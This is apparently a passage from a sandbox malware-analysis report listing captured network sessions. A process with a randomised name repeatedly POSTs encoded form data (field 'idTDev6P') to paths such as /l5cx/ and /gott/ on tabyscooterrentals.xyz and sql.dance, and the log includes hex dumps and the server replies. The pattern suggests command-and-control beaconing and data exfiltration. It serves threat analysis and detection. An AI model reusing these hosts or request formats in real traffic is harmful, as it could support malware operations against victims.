                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 76 7a 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.sovz.pro Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.45002985.159.66.93802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:16.850492001 CET762OUTPOST /l5cx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.tabyscooterrentals.xyz
                                                                            Origin: http://www.tabyscooterrentals.xyz
                                                                            Referer: http://www.tabyscooterrentals.xyz/l5cx/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 35 78 34 49 7a 42 5a 67 77 54 64 51 7a 37 6a 47 6b 59 54 6e 39 69 53 38 37 6a 41 2f 6a 44 49 59 39 4c 69 49 30 61 35 7a 66 75 6d 75 58 43 52 58 57 61 72 35 72 4b 54 4b 71 71 76 41 72 56 6d 58 38 31 2f 51 4f 6e 67 38 61 61 73 4f 67 7a 4b 6c 6d 50 73 50 71 77 4c 31 55 4a 61 4b 42 69 67 2f 47 70 36 2f 36 54 4e 63 36 6b 63 61 59 31 39 4b 32 31 41 41 6b 56 52 37 4f 4a 35 57 62 74 67 4c 2b 49 78 41 48 70 6f 75 49 76 76 72 49 63 64 78 50 72 41 34 64 4c 33 38 70 38 65 65 45 6e 46 58 44 33 62 71 4e 54 69 68 68 42 49 44 6a 38 37 52 56 52 65 58 73 67 3d 3d
                                                                            Data Ascii: idTDev6P=/ShqnqpQTwoV5x4IzBZgwTdQz7jGkYTn9iS87jA/jDIY9LiI0a5zfumuXCRXWar5rKTKqqvArVmX81/QOng8aasOgzKlmPsPqwL1UJaKBig/Gp6/6TNc6kcaY19K21AAkVR7OJ5WbtgL+IxAHpouIvvrIcdxPrA4dL38p8eeEnFXD3bqNTihhBIDj87RVReXsg==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.45003085.159.66.93802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:19.394483089 CET782OUTPOST /l5cx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.tabyscooterrentals.xyz
                                                                            Origin: http://www.tabyscooterrentals.xyz
                                                                            Referer: http://www.tabyscooterrentals.xyz/l5cx/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 2f 68 49 49 77 6d 46 67 32 7a 64 54 38 62 6a 47 39 6f 53 75 39 69 75 38 37 6e 34 56 6a 58 6b 59 39 70 36 49 79 76 46 7a 53 4f 6d 75 44 53 51 66 59 36 72 79 72 4b 66 64 71 76 76 41 72 56 43 58 38 78 37 51 4f 55 49 7a 61 4b 73 4d 6f 54 4b 6a 37 66 73 50 71 77 4c 31 55 4a 65 67 42 6d 4d 2f 46 59 4b 2f 37 79 4e 64 77 45 63 5a 50 46 39 4b 68 46 42 4a 6b 56 52 5a 4f 4e 78 34 62 75 59 4c 2b 4e 56 41 48 34 6f 70 44 76 76 74 46 38 63 76 65 5a 39 44 53 70 47 31 68 38 32 6c 4d 48 51 30 47 78 57 77 63 69 44 32 7a 42 73 77 2b 37 79 6c 59 53 6a 65 33 6c 37 55 45 72 74 6a 30 4f 6e 4b 51 6c 63 65 31 42 52 50 58 73 41 3d
                                                                            Data Ascii: idTDev6P=/ShqnqpQTwoV/hIIwmFg2zdT8bjG9oSu9iu87n4VjXkY9p6IyvFzSOmuDSQfY6ryrKfdqvvArVCX8x7QOUIzaKsMoTKj7fsPqwL1UJegBmM/FYK/7yNdwEcZPF9KhFBJkVRZONx4buYL+NVAH4opDvvtF8cveZ9DSpG1h82lMHQ0GxWwciD2zBsw+7ylYSje3l7UErtj0OnKQlce1BRPXsA=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.45003185.159.66.93802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:21.941726923 CET10864OUTPOST /l5cx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.tabyscooterrentals.xyz
                                                                            Origin: http://www.tabyscooterrentals.xyz
                                                                            Referer: http://www.tabyscooterrentals.xyz/l5cx/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 2f 68 49 49 77 6d 46 67 32 7a 64 54 38 62 6a 47 39 6f 53 75 39 69 75 38 37 6e 34 56 6a 57 77 59 39 36 79 49 78 49 52 7a 54 4f 6d 75 66 69 51 63 59 36 72 72 72 4b 48 52 71 76 72 51 72 58 71 58 7a 79 6a 51 49 68 38 7a 51 4b 73 4d 6b 7a 4b 69 6d 50 73 57 71 78 6d 2b 55 4a 75 67 42 6d 4d 2f 46 62 53 2f 79 44 4e 64 2f 6b 63 61 59 31 39 57 32 31 42 6c 6b 56 4a 7a 4f 4e 31 47 61 65 34 4c 35 74 46 41 46 4b 41 70 42 50 76 76 4c 63 63 6e 65 5a 78 63 53 70 4b 54 68 38 79 50 4d 46 4d 30 48 47 72 6d 4c 52 66 7a 69 42 30 52 68 38 75 7a 66 41 32 61 35 79 2f 2b 50 49 41 33 67 61 72 4b 61 79 78 48 6c 41 52 6e 46 71 71 33 75 6b 77 61 54 78 78 6b 35 57 41 77 62 2b 34 68 36 79 67 46 55 51 33 34 47 77 6f 44 2b 64 30 58 6f 56 6c 42 6a 4b 48 67 75 55 2f 74 38 42 57 57 64 47 41 33 75 77 73 42 36 32 46 43 52 77 6e 64 4b 30 71 30 31 7a 35 54 39 56 47 59 62 4a 2f 46 7a 55 4e 6f 72 75 4c 48 77 38 74 4a 5a 50 68 45 78 65 58 42 2f 66 37 6f 7a 6e 35 53 2b 67 46 7a 6a [TRUNCATED]
                                                                            Data Ascii: idTDev6P=/ShqnqpQTwoV/hIIwmFg2zdT8bjG9oSu9iu87n4VjWwY96yIxIRzTOmufiQcY6rrrKHRqvrQrXqXzyjQIh8zQKsMkzKimPsWqxm+UJugBmM/FbS/yDNd/kcaY19W21BlkVJzON1Gae4L5tFAFKApBPvvLccneZxcSpKTh8yPMFM0HGrmLRfziB0Rh8uzfA2a5y/+PIA3garKayxHlARnFqq3ukwaTxxk5WAwb+4h6ygFUQ34GwoD+d0XoVlBjKHguU/t8BWWdGA3uwsB62FCRwndK0q01z5T9VGYbJ/FzUNoruLHw8tJZPhExeXB/f7ozn5S+gFzjZbBTnhehqQiz7Js3u/s3NnzWlDZueINLgiI1IKnTdD2y/1ZssOyichAOFb2IWJ59YciYvGuSRcHN3xK1fHwM17oKJeeZAv2hcpuGt4oFMKpHsBbgVygwq3snaq8OYFgV7ifx4IwkJ1rkxmpVMU3xJ5/t5D5v+ju7kIapcLBskSLbu3PD4MvIxNl4T9g5Yc+/q8J4NByFT8sB3QO4+rPbFpSac3E8732KsBtTXvUzJZrEIEz5xe0E8Vrs3P17ZoowQIh/u46Rgjn9DWi2RydlU6IrazPs1x5WGKQIB1Mk37XdjiIr8z9ZtOjmJAlkoJUl82188o3zaHr0bD73dKC8Cmwz6/6QFOMnjAQbnoOFqhxyNBj+RBcCrYo6+o6fI1JedFrQ7km0SoIOoKxJ9V6TvwqrhHZ1xfwogqNK0i+Z09paYCPG70vedA974guGfg0zb7GqszbqRfrZhEzWwDYJJTwr1/9Ask8dp2Hk9zwlQ4JKYHzYQIJEXf+OK81n0IaB5ohdAl+9wsjhSuhDcNakRezc/TfAltCwsLO5YJu2/aK0ANWh/mNOIywIHRGB5B91E+P8YxYqoy62vNTaWKtNcBq40Hv+qY5xaroYF9gmt+gjXXtuhRiWrAa+j7TQIUnQtKxfwqVEAlWuNcJ39T/WqpnXeg1LvkyLk8 [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.45003285.159.66.93802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:24.495415926 CET476OUTGET /l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.tabyscooterrentals.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:21:25.172451973 CET225INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.14.1
                                                                            Date: Mon, 13 Jan 2025 09:21:25 GMT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            X-Rate-Limit-Limit: 5s
                                                                            X-Rate-Limit-Remaining: 19
                                                                            X-Rate-Limit-Reset: 2025-01-13T09:21:30.0626729Z


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.450033199.59.243.228802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:30.471219063 CET723OUTPOST /gott/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sql.dance
                                                                            Origin: http://www.sql.dance
                                                                            Referer: http://www.sql.dance/gott/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 78 74 30 67 77 50 47 35 50 33 51 35 63 58 49 68 62 71 2b 64 4f 72 76 43 41 66 50 2f 42 57 5a 4f 42 37 46 4f 62 6e 45 76 78 48 44 68 64 73 62 48 4d 62 36 41 54 63 4e 47 58 4a 45 6a 44 55 54 51 55 45 62 6e 65 76 31 71 4a 4c 62 45 64 6a 30 43 76 4d 62 58 31 5a 4b 2f 71 61 52 61 35 62 41 6a 63 6d 78 76 79 66 33 67 61 4d 4e 34 4f 58 43 67 6e 6f 6e 4e 6d 46 67 6c 6d 75 58 61 6a 52 6d 4e 47 70 6e 77 52 63 68 53 77 44 5a 77 66 4d 73 7a 72 42 62 56 31 49 63 6f 7a 63 72 77 6f 53 39 74 72 4a 51 4a 4e 32 78 46 63 6b 32 41 4a 5a 2b 61 37 51 30 64 77 3d 3d
                                                                            Data Ascii: idTDev6P=3mBp5/R5122skxt0gwPG5P3Q5cXIhbq+dOrvCAfP/BWZOB7FObnEvxHDhdsbHMb6ATcNGXJEjDUTQUEbnev1qJLbEdj0CvMbX1ZK/qaRa5bAjcmxvyf3gaMN4OXCgnonNmFglmuXajRmNGpnwRchSwDZwfMszrBbV1IcozcrwoS9trJQJN2xFck2AJZ+a7Q0dw==
                                                                            Jan 13, 2025 10:21:30.891829967 CET1236INHTTP/1.1 200 OK
                                                                            date: Mon, 13 Jan 2025 09:21:29 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1102
                                                                            x-request-id: 96ffb95d-45f0-406a-b87b-0a89fe9afb07
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==
                                                                            set-cookie: parking_session=96ffb95d-45f0-406a-b87b-0a89fe9afb07; expires=Mon, 13 Jan 2025 09:36:30 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Jan 13, 2025 10:21:30.891875029 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTZmZmI5NWQtNDVmMC00MDZhLWI4N2ItMGE4OWZlOWFmYjA3IiwicGFnZV90aW1lIjoxNzM2NzYwMD


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.450034199.59.243.228802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:33.012820005 CET743OUTPOST /gott/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sql.dance
                                                                            Origin: http://www.sql.dance
                                                                            Referer: http://www.sql.dance/gott/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 52 64 30 6e 6a 33 47 70 66 33 58 33 38 58 49 34 4c 72 33 64 4f 76 76 43 45 48 6d 2b 31 36 5a 4f 6a 6a 46 50 5a 50 45 75 78 48 44 71 39 74 66 4b 73 62 78 41 54 52 77 47 57 31 45 6a 44 6f 54 51 56 30 62 6e 4e 33 71 72 5a 4c 5a 49 39 6a 79 50 50 4d 62 58 31 5a 4b 2f 75 79 33 61 35 44 41 6a 74 57 78 39 67 6e 77 74 36 4d 4f 2f 4f 58 43 71 48 6f 6a 4e 6d 46 43 6c 6b 61 78 61 68 5a 6d 4e 47 35 6e 7a 46 77 69 5a 77 44 58 30 66 4e 34 69 61 67 33 4d 31 74 42 74 42 55 50 78 4c 76 63 68 4e 45 4b 59 38 58 6d 58 63 41 46 64 4f 51 4b 58 34 74 39 47 77 47 32 33 72 51 73 79 6e 4e 59 47 37 4b 30 2b 65 64 7a 43 33 77 3d
                                                                            Data Ascii: idTDev6P=3mBp5/R5122skRd0nj3Gpf3X38XI4Lr3dOvvCEHm+16ZOjjFPZPEuxHDq9tfKsbxATRwGW1EjDoTQV0bnN3qrZLZI9jyPPMbX1ZK/uy3a5DAjtWx9gnwt6MO/OXCqHojNmFClkaxahZmNG5nzFwiZwDX0fN4iag3M1tBtBUPxLvchNEKY8XmXcAFdOQKX4t9GwG23rQsynNYG7K0+edzC3w=
                                                                            Jan 13, 2025 10:21:33.452137947 CET1236INHTTP/1.1 200 OK
                                                                            date: Mon, 13 Jan 2025 09:21:33 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1102
                                                                            x-request-id: 1c8f4d91-65ea-4774-a865-544015b3231c
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==
                                                                            set-cookie: parking_session=1c8f4d91-65ea-4774-a865-544015b3231c; expires=Mon, 13 Jan 2025 09:36:33 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Jan 13, 2025 10:21:33.452184916 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWM4ZjRkOTEtNjVlYS00Nzc0LWE4NjUtNTQ0MDE1YjMyMzFjIiwicGFnZV90aW1lIjoxNzM2NzYwMD


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.450035199.59.243.228802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:35.691648006 CET10825OUTPOST /gott/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sql.dance
                                                                            Origin: http://www.sql.dance
                                                                            Referer: http://www.sql.dance/gott/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 52 64 30 6e 6a 33 47 70 66 33 58 33 38 58 49 34 4c 72 33 64 4f 76 76 43 45 48 6d 2b 30 75 5a 4f 77 72 46 4f 2b 54 45 74 78 48 44 6a 64 74 63 4b 73 62 57 41 54 35 30 47 57 35 55 6a 46 6b 54 51 7a 67 62 7a 6f 62 71 67 5a 4c 5a 56 74 6a 7a 43 76 4d 30 58 31 4a 77 2f 71 57 33 61 35 44 41 6a 76 4f 78 74 43 66 77 76 36 4d 4e 34 4f 58 4f 67 6e 70 38 4e 6d 4e 34 6c 6b 65 48 61 52 35 6d 4d 6e 4a 6e 2f 57 49 69 61 51 43 78 7a 66 4e 77 69 61 73 6f 4d 31 78 4e 74 41 67 78 78 4d 48 63 68 4c 31 69 45 2b 4c 42 4c 4f 51 71 46 63 77 51 5a 36 31 57 47 78 58 4b 2f 4b 63 34 79 6a 35 47 41 72 50 38 73 2f 52 32 54 44 42 6f 4c 79 6e 6f 4b 67 68 6c 30 57 63 33 35 6e 4b 30 62 73 39 64 32 6b 4f 56 79 66 51 63 31 41 38 45 56 5a 71 38 75 57 42 70 51 31 79 64 68 44 39 56 2f 50 78 6d 42 54 69 54 57 4f 43 68 39 63 52 59 50 7a 6e 63 5a 2b 43 32 58 4b 53 31 2b 47 74 37 75 6e 37 69 69 6a 32 62 63 56 72 69 37 77 64 6e 66 49 49 38 71 64 76 6b 6f 4a 31 31 76 36 43 46 56 [TRUNCATED]
